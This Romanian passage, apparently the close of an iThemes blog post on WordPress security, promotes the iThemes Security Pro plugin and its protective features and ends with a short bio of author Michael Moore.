Împreună cu cunoștințele despre subiectele de securitate WordPress din acest ghid, un plugin de securitate WordPress vă poate ajuta să vă securizați site-ul web WordPress. iThemes Security Pro, pluginul nostru de securitate WordPress, oferă peste 50 de moduri de a vă securiza și proteja site-ul împotriva vulnerabilităților comune de securitate WordPress. Cu WordPress, autentificarea în doi factori, protecția forței brute, aplicarea puternică a parolei și multe altele, puteți adăuga un strat suplimentar de securitate site-ului dvs. web.

Michael Moore

În fiecare săptămână, Michael realizează Raportul de vulnerabilitate WordPress pentru a vă menține site-urile în siguranță. În calitate de manager de produs la iThemes, el ne ajută să continuăm să îmbunătățim gama de produse iThemes. Este un tocilar uriaș și iubește să învețe despre toate lucrurile tehnice, vechi și noi. Îl poți găsi pe Michael stând cu soția și fiica sa, citind sau ascultând muzică atunci când nu funcționează.